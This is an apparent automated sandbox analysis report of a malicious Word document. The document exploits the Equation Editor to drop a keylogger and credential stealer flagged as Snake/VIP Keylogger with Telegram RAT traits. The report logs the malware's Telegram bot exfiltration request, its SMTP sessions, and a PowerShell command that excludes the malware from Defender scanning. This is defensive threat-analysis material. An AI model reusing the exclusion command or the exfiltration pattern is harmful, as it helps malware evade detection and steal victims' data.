Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49174	188.114.96.3	443	3508	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:19:38 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:19:38 UTC	675	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:38 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 10 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hCvRq8aZXC8HVdMRuXeUBWWrZcWFzZbR%2F3axrFzav6zoEyjLG7WWsfDyKoN2d45GZaBX07CNDa1kU6wlNlIUK2zjE0FhGbymdPXHNSKIfFwT%2BdSGmu%2BOHAQ0At%2BqNMZxJQObDTAq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c917ca17d094315-EWR
2024-09-26 07:19:38 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:19:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.22	49176	188.114.96.3	443	3508	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:19:40 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:19:40 UTC	683	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:40 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LBdj%2BTWxkbGAYOl%2FO9li5HxL%2BtV7sBjoB383pshVat4ynLDkS3AM3tBDcfQ7%2Bz37xcXhEKbXih%2ByZgrIgJLI4EBRQAdM5Iv4ws71v2V%2BYwsTQdIaOdmtFTXabP9s46%2F%2B5nyRVxyI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c917cab9c514245-EWR
2024-09-26 07:19:40 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:19:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.22	49178	188.114.97.3	443	3508	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:19:41 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:19:41 UTC	671	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:41 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 13 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5iIEIDQZojkF31XSEb%2FXudmyWL2bhB66TMEbxv8l0EUIus3IJItvv14ZuHSJr4kzS5EgIb9yxYNNHYl3eYFzsnf6UbafvYC2HxhWDdesMJKeW%2FpfpAK6Mh0qUquVICTdQtXvKiGl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c917cb28b4743f1-EWR
2024-09-26 07:19:41 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:19:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.22	49179	149.154.167.220	443	3508	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:19:41 UTC	352	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20and%20Time:%209/26/2024%20/%206:20:30%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20358075%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-09-26 07:19:42 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 26 Sep 2024 07:19:42 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-26 07:19:42 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Sep 26, 2024 09:19:59.252964020 CEST	587	49180	217.12.218.219	192.168.2.22	220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 09:19:59 +0200
Sep 26, 2024 09:19:59.253278971 CEST	49180	587	192.168.2.22	217.12.218.219	EHLO 358075
Sep 26, 2024 09:19:59.427478075 CEST	587	49180	217.12.218.219	192.168.2.22	250-h2-eu1.layer6.net Hello 358075 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN CRAM-MD5 250-CHUNKING 250-STARTTLS 250 HELP
Sep 26, 2024 09:19:59.506918907 CEST	49180	587	192.168.2.22	217.12.218.219	STARTTLS
Sep 26, 2024 09:19:59.680176973 CEST	587	49180	217.12.218.219	192.168.2.22	220 TLS go ahead
Sep 26, 2024 09:19:59.899851084 CEST	587	49180	217.12.218.219	192.168.2.22	220 TLS go ahead
Sep 26, 2024 09:20:05.132533073 CEST	587	49181	217.12.218.219	192.168.2.22	220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 09:20:05 +0200
Sep 26, 2024 09:20:05.132725000 CEST	49181	587	192.168.2.22	217.12.218.219	EHLO 358075
Sep 26, 2024 09:21:11.370918989 CEST	587	49183	217.12.218.219	192.168.2.22	220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 09:21:11 +0200
Sep 26, 2024 09:21:11.371081114 CEST	49183	587	192.168.2.22	217.12.218.219	EHLO 358075
Sep 26, 2024 09:21:11.542587996 CEST	587	49183	217.12.218.219	192.168.2.22	250-h2-eu1.layer6.net Hello 358075 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN CRAM-MD5 250-CHUNKING 250-STARTTLS 250 HELP
Sep 26, 2024 09:21:11.542742014 CEST	49183	587	192.168.2.22	217.12.218.219	STARTTLS
Sep 26, 2024 09:21:11.715711117 CEST	587	49183	217.12.218.219	192.168.2.22	220 TLS go ahead

Target ID:	0
Start time:	03:19:17
Start date:	26/09/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13fc20000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	03:19:18
Start date:	26/09/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:19:22
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"
Imagebase:	0xd20000
File size:	708'096 bytes
MD5 hash:	3E2EA8C3F5CA13F16F8CA1C85087F6B6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:19:23
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"
Imagebase:	0x50000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:19:23
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"
Imagebase:	0xd20000
File size:	708'096 bytes
MD5 hash:	3E2EA8C3F5CA13F16F8CA1C85087F6B6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	03:19:41
Start date:	26/09/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	62.9%
Total number of Nodes:	116
Total number of Limit Nodes:	6

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 002ACB15 Relevance: 6.1, APIs: 4, Instructions: 112
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(002ACB07), ref: 002ACB15

Part of subcall function 002ACB2F: URLDownloadToFileW.URLMON(00000000,002ACB40,?,00000000,00000000), ref: 002ACB9E
Part of subcall function 002ACB2F: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 002ACBFC
Part of subcall function 002ACB2F: ExitProcess.KERNELBASE(00000000), ref: 002ACC14

Memory Dump Source

Source File: 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0029E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29e000_EQNEDT32.jbxd

Similarity

API ID: Process$CreateDownloadExitFileLibraryLoad
String ID:
API String ID: 3376099886-0
Opcode ID: daf2d30e0ec1adf7040262130c6e2f298998fb8ce8c8b0d163854f404aace5fc
Instruction ID: 58b8529db521aca1b4e49b42812076c297f6a9b45739cb43e58029de12e7510a
Opcode Fuzzy Hash: daf2d30e0ec1adf7040262130c6e2f298998fb8ce8c8b0d163854f404aace5fc
Instruction Fuzzy Hash: 5431A6A246C3C11FCB26A7700C6AA55BF656F63314F688ECFD0C6090A3EA698154C767

Function 002ACA8B Relevance: 4.7, APIs: 3, Instructions: 162
processfilenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,002ACB40,?,00000000,00000000), ref: 002ACB9E
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 002ACBFC

Memory Dump Source

Source File: 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0029E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29e000_EQNEDT32.jbxd

Similarity

API ID: CreateDownloadFileProcess
String ID:
API String ID: 3322632208-0
Opcode ID: aae0db6790f011fe53033717ca6883099684063eaccabe539bc309a663605c2b
Instruction ID: 41f738c8b25d797d16f1dc73ef3db0adaffad93c1cb0f499af5c6d3f15010d19
Opcode Fuzzy Hash: aae0db6790f011fe53033717ca6883099684063eaccabe539bc309a663605c2b
Instruction Fuzzy Hash: E75115A242C3C11FDB23AB300D6AA55BF657F13314B6C8ECFD0C64A0A3EA698515C767

Function 002ACB2F Relevance: 4.6, APIs: 3, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0029E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29e000_EQNEDT32.jbxd

Similarity

API ID: Process$CreateDownloadExitFile
String ID:
API String ID: 2126523932-0
Opcode ID: 1644bbf2a3913ddcffe31929f1a10b5a5fdc839b81794f7fd4bc06f53cb41c47
Instruction ID: 0666ab034398fdf379679c4b91da888508a0ddfb04fd570fcb2f56545d25bbbe
Opcode Fuzzy Hash: 1644bbf2a3913ddcffe31929f1a10b5a5fdc839b81794f7fd4bc06f53cb41c47
Instruction Fuzzy Hash: 9E3175A285C3C11FCB2297700C6DA55BF656F53314F688ECFD0DA0A493EA698154C766

Function 002ACB9C Relevance: 4.6, APIs: 3, Instructions: 71
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,002ACB40,?,00000000,00000000), ref: 002ACB9E

Part of subcall function 002ACBB5: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 002ACBFC
Part of subcall function 002ACBB5: ExitProcess.KERNELBASE(00000000), ref: 002ACC14

Memory Dump Source

Source File: 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0029E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29e000_EQNEDT32.jbxd

Similarity

API ID: Process$CreateDownloadExitFile
String ID:
API String ID: 2126523932-0
Opcode ID: 9180f0b284761833f9f31796fac9cfcee9c35c59c9fab4882ec9e8daa7a07ec6
Instruction ID: e4ac918957ed2be2c63adf5dd08b37af5c065bbf052f95df20913fa416035426
Opcode Fuzzy Hash: 9180f0b284761833f9f31796fac9cfcee9c35c59c9fab4882ec9e8daa7a07ec6
Instruction Fuzzy Hash: D711297503834127CE10FB708D85B9AF35FBBD3720F348D4BE1180A116DD70C9689669

Function 002ACBB5 Relevance: 3.1, APIs: 2, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0029E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29e000_EQNEDT32.jbxd

Similarity

API ID: Process$CreateExit
String ID:
API String ID: 126409537-0
Opcode ID: fdbaa3d9f1220df4e5171d05b8988b32f4ca09a6248049512152c847acd2eb6c
Instruction ID: 9a6a2ec801d5306c1b89a43adc21dbf9443d9973886ffc46b8fdd55fb45e874b
Opcode Fuzzy Hash: fdbaa3d9f1220df4e5171d05b8988b32f4ca09a6248049512152c847acd2eb6c
Instruction Fuzzy Hash: 7B110A7503834367CB21FB7088806DAB79BEB83730F74C95BE4984501ADD34C9A68729

Function 002ACBD6 Relevance: 3.1, APIs: 2, Instructions: 56
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 002ACBFC

Part of subcall function 002ACC0F: ExitProcess.KERNELBASE(00000000), ref: 002ACC14

Memory Dump Source

Source File: 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0029E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29e000_EQNEDT32.jbxd

Similarity

API ID: Process$CreateExit
String ID:
API String ID: 126409537-0
Opcode ID: 4581ba8be27b4f40f7c6f75f124480c8923545fa759ab39b88aabc2470b18446
Instruction ID: 9452705a75eb74b393751cd08cacf5796ce2363455ecb71b8ef9cdda22a06579
Opcode Fuzzy Hash: 4581ba8be27b4f40f7c6f75f124480c8923545fa759ab39b88aabc2470b18446
Instruction Fuzzy Hash: BB012BA9038343A7CB30BA748C847EA7757EB83730FB88A57D88D04049DD6895F38719

Function 002ACC0F Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNELBASE(00000000), ref: 002ACC14

Memory Dump Source

Source File: 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0029E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29e000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Function 002ACC16 Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0029E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29e000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: 6206cd6b9208231793cbeddf61be258f1f4309382b35ec8e9783c12de730536e
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: 94D05E312114428FC304EF04D940E12F36AFFC4720B24C269E0044B719DB30ECA1CB94

Non-executed Functions

Function 002ACA56 Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNELBASE(002ACA44), ref: 002ACA56

Memory Dump Source

Source File: 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0029E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29e000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: c44ec1f4e43fe0341f78c31807ab001956be4505fba70030ac586171738022f9
Instruction ID: ada89c2aa40e6d7190a61b99a7fe6a083abe2159042ec07812f266c90d6e31b9
Opcode Fuzzy Hash: c44ec1f4e43fe0341f78c31807ab001956be4505fba70030ac586171738022f9
Instruction Fuzzy Hash: F92101A642D3C44FD703DF30196B1617F60BD2331472D8ACBD0C08F1A3EA619A2AD7A2

Analysis Process: hgqilegacy20306.exePID: 3416, Parent PID: 3268COMMON

Execution Graph

Execution Coverage:	15%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	128
Total number of Limit Nodes:	2

Executed Functions

Function 00230760 Relevance: 2.6, Strings: 1, Instructions: 1362COMMON

Download Yara Rule

Strings

Ppp, xrefs: 002316B1

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID: Ppp
API String ID: 0-99483665
Opcode ID: 1835a9b7aefae1ff65b555128fb04f0bec671a57332e71dc7fff12d98059a691
Instruction ID: 5ffcb62b75c207c7c1067fc6946b78b127e02ea1e288e549a4be818f952aa30c
Opcode Fuzzy Hash: 1835a9b7aefae1ff65b555128fb04f0bec671a57332e71dc7fff12d98059a691
Instruction Fuzzy Hash: E9E2E774A11719CFCB24EF64C898A99B3B1FF89300F1186E9E5096B361DB71AE85CF50

Function 00231219 Relevance: 2.6, Strings: 1, Instructions: 1360COMMON

Download Yara Rule

Strings

Ppp, xrefs: 002316B1

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID: Ppp
API String ID: 0-99483665
Opcode ID: 8126da246dca6a7a9879f02f5398bf8db5ec98d78e605d731a39c4fa97c067ce
Instruction ID: 5ac3fe616d7c46383e5f2ae602fece50bde0d6714a5099831315fa6615500275
Opcode Fuzzy Hash: 8126da246dca6a7a9879f02f5398bf8db5ec98d78e605d731a39c4fa97c067ce
Instruction Fuzzy Hash: E5E2F874A11719CFC714EF64C898A99B7B1FF8A300F1186E9E5096B361DB31AE85CF50

Function 00233C10 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f7f6bdf0edcea964b1fc06d2f5587de9660353cca54adf2f630ec9932948c42
Instruction ID: 4b6bc280274924b11a2c262009efd2544688c69a3860a0c667c8a8b00a67493d
Opcode Fuzzy Hash: 1f7f6bdf0edcea964b1fc06d2f5587de9660353cca54adf2f630ec9932948c42
Instruction Fuzzy Hash: D97106B0D28618CBDB14CFA6C8406EDBBB6BF89300F20E46AD419BB255DB744B56DF50

Function 002377E0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

